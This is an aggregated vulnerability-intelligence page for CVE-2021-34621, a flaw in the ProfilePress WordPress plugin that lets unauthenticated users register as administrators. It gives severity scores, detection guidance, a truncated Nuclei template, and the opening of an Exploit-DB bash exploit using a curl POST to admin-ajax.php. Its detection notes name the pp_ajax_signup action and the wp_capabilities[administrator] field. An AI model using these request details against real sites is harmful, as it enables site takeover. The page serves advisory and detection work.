CVE-2021-34621
published 2021-07-07CVE-2021-34621: A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible…
PriorityP188critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
68.86%
99.3th percentile
A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. .
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| profilepress | profilepress | — | — |
| properfraction | profilepress | 3.0.0 – 3.1.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated POST requests to /wp-admin/admin-ajax.php containing both the 'pp_ajax_signup' action and 'wp_capabilities[administrator]=1' parameter, which indicates an attempt to self-register as a WordPress administrator via the ProfilePress plugin vulnerability. ↗
- →Monitor for new WordPress user accounts created with administrator role originating from the ProfilePress registration flow (pp_ajax_signup action). Successful exploitation results in a 200 response and the attacker can subsequently access /wp-admin/ with a 'Welcome to your WordPress Dashboard' response.
- →The exploit uses multipart/form-data with a specific boundary value; network signatures can key on the boundary string combined with the pp_ajax_signup action and wp_capabilities[administrator] field.
- ·Affected versions are strictly 3.0.0 through 3.1.3 of the ProfilePress (formerly WP User Avatar) plugin. Detection rules should be scoped to sites running these versions to reduce false positives. ↗
- ·The exploit requires WordPress 4.7 or higher to be present alongside the vulnerable plugin version range. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h9qm-fw5r-9vmm: A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth
ghsa_unreviewed·2022-05-24
CVE-2021-34621 [CRITICAL] CWE-269 GHSA-h9qm-fw5r-9vmm: A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth
A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. .
VulnCheck
properfraction profilepress Improper Privilege Management
vulncheck·2021·CVSS 9.8
CVE-2021-34621 [CRITICAL] properfraction profilepress Improper Privilege Management
properfraction profilepress Improper Privilege Management
A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. .
Affected: properfraction profilepress
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar/user-registration-user-profiles-login-membership-profilepress-formerly-wp-user-avatar-300-313-unauthenticated-privilege-escalation-2
Exploit PoC: https://vulncheck.com/xdb/097
No detection rules found.
Exploit-DB
WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
exploitdb·2021-08-31·CVSS 9.8
CVE-2021-34621 [CRITICAL] WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
---
# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
[2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621
#!/bin/bash
# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3
# Change the name and password as per your requirement.
URL=$1
curl -X POST $URL"/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "reg_username=numan"
Nuclei
WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
nuclei·CVSS 9.8
CVE-2021-34621 [CRITICAL] WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
Template:
id: CVE-2021-34621
info:
name: WordPress ProfilePress 3.0.0-3.1.3 - Admin User Creation Weakness
author: 0xsapra
severity: critical
description: ProfilePress WordPress plugin is susceptible to a vulnerability in the user registration component in the ~/src/Classes/RegistrationAuth.php file that makes it possible for users to register on sites as an administrator.
impact: |
An attacker can exploit this vulnerability to create unauthorized admin accounts and gain full control over the WordPress s
http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.htmlhttps://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/http://packetstormsecurity.com/files/163973/WordPress-ProfilePress-3.1.3-Privilege-Escalation.htmlhttps://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/
2021-07-07
Published
Exploited in the wild